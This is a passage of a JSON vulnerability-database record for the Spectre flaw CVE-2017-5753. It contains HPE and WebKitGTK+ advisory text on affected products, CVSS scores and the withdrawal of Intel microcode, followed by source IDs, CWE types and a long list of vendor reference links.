ProLiant m350 Server Cartridge - To be delivered\n  - HPE ProLiant m300 Server Cartridge - To be delivered\n  - HPE ProLiant MicroServer Gen8 - To be delivered\n  - HPE ProLiant ML310e Gen8 v2 Server - To be delivered\n  - HPE Superdome Flex Server - To be delivered\n  - HP 3PAR StoreServ File Controller - To be delivered - v3 impacted\n  - HPE StoreVirtual 3000 File Controller - To be delivered\n  - HPE StoreEasy 1450 Storage - To be delivered\n  - HPE StoreEasy 1550 Storage - To be delivered\n  - HPE StoreEasy 1650 Storage - To be delivered\n  - HPE StoreEasy 3850 Gateway Storage - To be delivered\n  - HPE StoreEasy 1850 Storage - To be delivered\n  - HP ConvergedSystem 700 - To be delivered\n  - HPE Converged Architecture 700 - To be delivered\n  - HP ProLiant DL580 Gen8 Server - To be delivered\n  - HPE Cloudline CL2100 Gen10 Server - To be delivered\n  - HPE Cloudline CL2200 Gen10 Server - To be delivered\n  - HPE Cloudline CL3150 G4 Server - To be delivered\n  - HPE Cloudline CL5200 G3 Server - To be delivered\n  - HPE Cloudline CL3100 G3 Server - To be delivered\n  - HPE Cloudline CL2100 G3 807S 8 SFF Configure-to-order Server - To be\ndelivered\n  - HPE Cloudline CL2100 G3 407S 4 LFF Configure-to-order Server - To be\ndelivered\n  - HPE Cloudline CL2100 G3 806R 8SFF Configure-to-order Server - To be\ndelivered\n  - HPE Cloudline CL2200 G3 1211R 12 LFF Configure-to-order Server - To be\ndelivered\n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2017-5715\n      8.2 CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N\n      6.8 (AV:A/AC:L/Au:N/C:C/I:P/A:N)\n\n    CVE-2017-5753\n      5.0 CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L\n      5.4 (AV:A/AC:M/Au:N/C:P/I:P/A:P)\n\n    CVE-2017-5754\n      7.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n      7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\n\nOn January 11, Intel announced issues with an increased frequency of reboots\nwhen using the microcodes they released to address Variant 2 of the Spectre\nVulnerability for numerous processors including Broadwell, Haswell, Skylake,\nKaby Lake, Ivybridge, and Sandybridge processors.  Intel has now identified\nthe root cause of these issues and determined that these microcodes may\nintroduce reboots and other unpredictable system behavior.  Due to the\nseverity of the potential issues that may occur when using these microcodes,\nIntel is now recommending that customers discontinue their use.  Additional\ninformation is available from Intels Security Exploit Newsroom here:\n\u003chttps://newsroom.intel.com/press-kits/security-exploits-intel-products/\u003e . \nHPE is in alignment with Intel in our recommendation that customers\ndiscontinue use of System ROMs including impacted microcodes and revert to\nearlier System ROM versions.  \n\nAll System ROMs including impacted microcodes have been removed from the HPE\nSupport Site.  This impacts HPE ProLiant and Synergy Gen10, Gen9, and Gen8 v2\nservers as well as HPE Superdome servers for which updated System ROMs had\npreviously been made available.  Intel is working on updated microcodes to\naddress these issues, and HPE will validate updated System ROMs including\nthese microcodes and make them available to our customers in the coming\nweeks.  \n\nMitigations for Variant 1 (Spectre) and Variant 3 (Meltdown) vulnerabilities\nrequire only OS updates and are not impacted. \n\n  * HPE has provided a customer bulletin\n\u003chttps://support.hpe.com/hpsc/doc/public/display?docId=emr_na-a00039267en_us\u003e\nwith specific instructions to obtain the udpated sytem ROM\n  \n  - Note:\n   \n    + CVE-2017-5715 (Variant 2) requires that the System ROM be updated and a\nvendor supplied operating system update be applied as well. \n    + For CVE-2017-5753, CVE-2017-5754 (Variants 1 and 3) require only\nupdates of a vendor supplied operating system. \n    + HPE will continue to add additional products to the list. \n\nHISTORY\n\nVersion:1 (rev.1) - 4 January 2018 Initial release\n\nVersion:2 (rev.2) - 5 January 2018 Added additional impacted products\n\nVersion:3 (rev.3) - 10 January 2018 Added  more impacted products\n\nVersion:4 (rev.4) - 9 January 2018 Fixed product ID\n\nVersion:5 (rev.5) - 18 January 2018 Added additional impacted products\n\nVersion:6 (rev.6) - 19 January 2018 updated impacted product list\n\nVersion:7 (rev.7) - 23 January 2018 Marked impacted products with TBD for\nSystem ROM updates per Intel\u0027s guidance on microcode issues\n\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nSeveral vulnerabilities were discovered in WebKitGTK+. \n\nCVE-2017-5753\n    Versions affected: WebKitGTK+ before 2.18.5. \n    Credit to Jann Horn of Google Project Zero; and Paul Kocher in\n    collaboration with Daniel Genkin of University of Pennsylvania and\n    University of Maryland, Daniel Gruss of Graz University of\n    Technology, Werner Haas of Cyberus Technology, Mike Hamburg of\n    Rambus (Cryptography Research Division), Moritz Lipp of Graz\n    University of Technology, Stefan Mangard of Graz University of\n    Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz\n    of Graz University of Technology, and Yuval Yarom of University of\n    Adelaide and Data61. Description: Security improvements\n    are included to mitigate the effects. \n\nCVE-2017-5715\n    Versions affected: WebKitGTK+ before 2.18.5. \n    Credit to Jann Horn of Google Project Zero; and Paul Kocher in\n    collaboration with Daniel Genkin of University of Pennsylvania and\n    University of Maryland, Daniel Gruss of Graz University of\n    Technology, Werner Haas of Cyberus Technology, Mike Hamburg of\n    Rambus (Cryptography Research Division), Moritz Lipp of Graz\n    University of Technology, Stefan Mangard of Graz University of\n    Technology, Thomas Prescher of Cyberus Technology, Michael Schwarz\n    of Graz University of Technology, and Yuval Yarom of University of\n    Adelaide and Data61. Description: Security\n    improvements are included to mitigate the effects. \n\n\nWe recommend updating to the last stable version of WebKitGTK+. It is\nthe best way of ensuring that you are running a safe version of\nWebKitGTK+. Please check our website for information about the last\nstable releases. \n\nFurther information about WebKitGTK+ Security Advisories can be found\nat: https://webkitgtk.org/security.html\n\nThe WebKitGTK+ team,\nJanuary 10, 2018\n\n. 7.2) - noarch, x86_64\n\n3",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "PACKETSTORM",
        "id": "145718"
      },
      {
        "db": "PACKETSTORM",
        "id": "146017"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145762"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146026"
      },
      {
        "db": "PACKETSTORM",
        "id": "146315"
      },
      {
        "db": "PACKETSTORM",
        "id": "145837"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "db": "PACKETSTORM",
        "id": "145774"
      }
    ],
    "trust": 3.6
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-113956",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-5753",
        "trust": 3.2
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653",
        "trust": 2.2
      },
      {
        "db": "BID",
        "id": "102371",
        "trust": 2.0
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049",
        "trust": 1.9
      },
      {
        "db": "SECTRACK",
        "id": "1040071",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-505225",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-608355",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145645",
        "trust": 1.1
      },
      {
        "db": "LENOVO",
        "id": "LEN-18282",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "43427",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-003",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-002",
        "trust": 1.1
      },
      {
        "db": "USCERT",
        "id": "TA18-141A",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304",
        "trust": 0.6
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01E",
        "trust": 0.3
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01C",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10842",
        "trust": 0.3
      },
      {
        "db": "SIEMENS",
        "id": "SSA-168644",
        "trust": 0.3
      },
      {
        "db": "JVN",
        "id": "JVNVU93823979",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "145837",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "145774",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "150863",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145715",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-150",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145718",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146017",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147451",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145641",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145762",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146771",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145666",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146026",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146315",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145635",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "145718"
      },
      {
        "db": "PACKETSTORM",
        "id": "146017"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "145774"
      },
      {
        "db": "PACKETSTORM",
        "id": "145762"
      },
      {
        "db": "PACKETSTORM",
        "id": "146771"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146026"
      },
      {
        "db": "PACKETSTORM",
        "id": "146315"
      },
      {
        "db": "PACKETSTORM",
        "id": "145837"
      },
      {
        "db": "PACKETSTORM",
        "id": "145635"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "id": "VAR-201801-1712",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      }
    ],
    "trust": 1.3327639805555553
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      }
    ]
  },
  "last_update_date": "2024-07-23T21:03:25.229000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-203",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-200",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.2,
        "url": "http://www.kb.cert.org/vuls/id/584653"
      },
      {
        "trust": 1.9,
        "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/security/vulnerabilities/speculativeexecution"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/102371"
      },
      {
        "trust": 1.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html"
      },
      {
        "trust": 1.6,
        "url": "https://support.apple.com//ht208394"
      },
      {
        "trust": 1.6,
        "url": "http://www.dell.com/support/speculative-store-bypass"
      },
      {
        "trust": 1.4,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180104-cpusidechannel"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html"
      },
      {
        "trust": 1.4,
        "url": "http://xenbits.xen.org/xsa/advisory-254.html"
      },
      {
        "trust": 1.4,
        "url": "https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/"
      },
      {
        "trust": 1.4,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180002"
      },
      {
        "trust": 1.4,
        "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us"
      },
      {
        "trust": 1.4,
        "url": "https://spectreattack.com/"
      },
      {
        "trust": 1.4,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
      },
      {
        "trust": 1.2,
        "url": "https://access.redhat.com/errata/rhsa-2018:0292"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/jun/36"
      },
      {
        "trust": 1.1,
        "url": "https://www.kb.cert.org/vuls/id/180049"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4609"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4611"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4613"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4614"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-001.txt"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2019-003.txt"
      },
      {
        "trust": 1.1,
        "url": "https://aws.amazon.com/de/security/security-bulletins/aws-2018-013/"
      },
      {
        "trust": 1.1,
        "url": "https://cdrdv2.intel.com/v1/dl/getcontent/685359"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-505225.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-002"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-003"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20180104-0001/"
      },
      {
        "trust": 1.1,
        "url": "https://support.citrix.com/article/ctx231399"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k91229003"
      },
      {
        "trust": 1.1,
        "url": "https://support.lenovo.com/us/en/solutions/len-18282"
      },
      {
        "trust": 1.1,
        "url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-18-0001"
      },
      {
        "trust": 1.1,
        "url": "https://www.suse.com/c/suse-addresses-meltdown-spectre-vulnerabilities/"
      },
      {
        "trust": 1.1,
        "url": "https://www.synology.com/support/security/synology_sa_18_01"
      },
      {
        "trust": 1.1,
        "url": "https://www.vmware.com/us/security/advisories/vmsa-2018-0002.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4187"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4188"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/43427/"
      },
      {
        "trust": 1.1,
        "url": "https://security.gentoo.org/glsa/201810-06"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/145645/spectre-information-disclosure-proof-of-concept.html"
      },
      {
        "trust": 1.1,
        "url": "https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 1.1,
        "url": "https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00034.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00004.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040071"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00006.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00008.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00014.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3516-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3540-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3540-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3541-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3541-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3542-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3542-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3549-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3580-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-2/"
      },
      {
        "trust": 1.0,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.8,
        "url": "https://vuls.cert.org/confluence/display/wiki/vulnerabilities+associated+with+cpu+speculative+execution"
      },
      {
        "trust": 0.8,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1528"
      },
      {
        "trust": 0.8,
        "url": "https://developer.amd.com/wp-content/resources/124441_amd64_speculativestorebypassdisable_whitepaper_final.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://www.us-cert.gov/ncas/alerts/ta18-141a"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/208.html"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/c5/63/336996-speculative-execution-side-channel-mitigations.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/b9/f9/336983-intel-analysis-of-speculative-execution-side-channels-white-paper.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180521-cpusidechannel"
      },
      {
        "trust": 0.8,
        "url": "https://fortiguard.com/psirt/fg-ir-18-002"
      },
      {
        "trust": 0.8,
        "url": "https://support.hp.com/us-en/document/c06001626"
      },
      {
        "trust": 0.8,
        "url": "http://www.hitachi.com/hirt/publications/hirt-pub18001/"
      },
      {
        "trust": 0.8,
        "url": "https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/"
      },
      {
        "trust": 0.8,
        "url": "https://docs.microsoft.com/en-us/cpp/security/developer-guidance-speculative-execution"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/vulnerabilities/ssbd"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/support/kb/doc/?id=7022937"
      },
      {
        "trust": 0.8,
        "url": "https://www.synology.com/en-global/support/security/synology_sa_18_23"
      },
      {
        "trust": 0.8,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/variant4"
      },
      {
        "trust": 0.8,
        "url": "https://kb.vmware.com/s/article/54951"
      },
      {
        "trust": 0.8,
        "url": "https://aws.amazon.com/security/security-bulletins/aws-2018-015/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2017-5753"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753"
      },
      {
        "trust": 0.6,
        "url": "https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2017-5754"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2017-5715"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0008"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0010"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0016"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5754"
      },
      {
        "trust": 0.3,
        "url": "http://www.amd.com/en-gb"
      },
      {
        "trust": 0.3,
        "url": "https://www.arm.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.intel.com/content/www/us/en/homepage.html"
      },
      {
        "trust": 0.3,
        "url": "https://newsroom.intel.com/news/intel-responds-to-security-research-findings/"
      },
      {
        "trust": 0.3,
        "url": "https://lwn.net/articles/738975/"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10842\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://support.apple.com/en-us/ht208394"
      },
      {
        "trust": 0.3,
        "url": "https://www.chromium.org/home/chromium-security/ssca"
      },
      {
        "trust": 0.3,
        "url": "https://www.amd.com/en/corporate/speculative-execution"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2018-01-01"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jan/21"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jan/22"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jan/23"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1519778"
      },
      {
        "trust": 0.3,
        "url": "http://xenbits.xenproject.org/xsa/advisory-289.html"
      },
      {
        "trust": 0.3,
        "url": "https://support.google.com/faqs/answer/7622138"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01c"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01e"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/120"
      },
      {
        "trust": 0.3,
        "url": "https://jvn.jp/vu/jvnvu93823979/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2018-4431088.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletin-for-meltdown-and-spectre-update-1"
      },
      {
        "trust": 0.3,
        "url": "https://googleprojectzero.blogspot.in/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0007"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0009"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0011"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0017"
      },
      {
        "trust": 0.3,
        "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa161"
      },
      {
        "trust": 0.3,
        "url": "https://www.mozilla.org/en-us/security/advisories/mfsa2018-01/"
      },
      {
        "trust": 0.3,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-168644.pdf"
      },
      {
        "trust": 0.3,
        "url": "https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-chrome-os_19.html"
      },
      {
        "trust": 0.3,
        "url": "https://lists.vmware.com/pipermail/security-announce/2018/000397.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.vmware.com/security/advisories/vmsa-2018-0007.html"
      },
      {
        "trust": 0.3,
        "url": "https://developer.arm.com/support/security-update"
      },
      {
        "trust": 0.3,
        "url": "http://xenbits.xenproject.org/xsa/advisory-289.txt"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.1,
